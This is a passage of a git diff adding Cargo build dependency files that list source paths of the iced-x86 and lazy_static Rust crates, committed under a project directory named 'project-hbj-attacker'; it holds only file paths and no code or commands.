/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_evex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_legacy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_vex.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_xop.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/evex_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/legacy_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/vex_reader.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/encoder_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/handlers_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/instruction_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mem_op.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mnemonic_str_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_handler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_kind_tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops_tables.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums_shared.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/options.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/pseudo_ops_fast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options_fast_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opt_provider.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils_all.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/info.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/mem_size_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/regs.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt_opts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/pseudo_ops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl_ls.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/string_output.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/symres.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_constants.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_features.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/cpuid_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/enums.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/factory.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/info_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/rflags_table.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_create.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_memory_sizes.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_op_counts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/memory_size.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonic.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonics.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/register.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/tuple_type_tbl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/../README.md
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/block.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/call_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/ip_relmem_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jcc_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/jmp_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_br_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/simple_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/block_enc/instr/xbegin_instr.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/code.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/constant_offsets.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/data_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/d3now.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/evex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/fpu.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/legacy.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/handlers/vex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_evex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_legacy.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_vex.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/data_xop.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/evex_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/legacy_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/decoder/table_de/vex_reader.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/encoder_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/handlers_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/instruction_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mem_op.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/mnemonic_str_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_handler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_code_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/op_kind_tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/encoder/ops_tables.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/enums_shared.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/options.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/pseudo_ops_fast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fast/trait_options_fast_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_consts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opt_provider.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_opts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/fmt_utils_all.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/gas/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/intel/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/masm/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/fmt_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/info.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/mem_size_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/nasm/regs.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/num_fmt_opts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/pseudo_ops.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/regs_tbl_ls.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/string_output.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/strings_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/formatter/symres.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_constants.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_error.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/iced_features.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/cpuid_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/enums.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/factory.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/info_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/info/rflags_table.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_create.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_internal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_memory_sizes.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/instruction_op_counts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/memory_size.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonic.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/mnemonics.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/register.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/tuple_type_tbl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/iced-x86-1.21.0/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/lazy_static-0aeb88bcc2e3d662.d b/01/project-hbj-attacker/target/debug/deps/lazy_static-0aeb88bcc2e3d662.d
new file mode 100644
index 0000000..a0fa4a4
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/lazy_static-0aeb88bcc2e3d662.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/lazy_static-0aeb88bcc2e3d662.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/inline_lazy.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/inline_lazy.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/inline_lazy.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/lazy_static-1.5.0/src/inline_lazy.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/lazy_static-4f23730150718286.d b/01/project-hbj-attacker/target/debug/deps/lazy_static-4f23730150718286.d
new file mode 100644
index 0000000..07fb63d
--- /dev/null
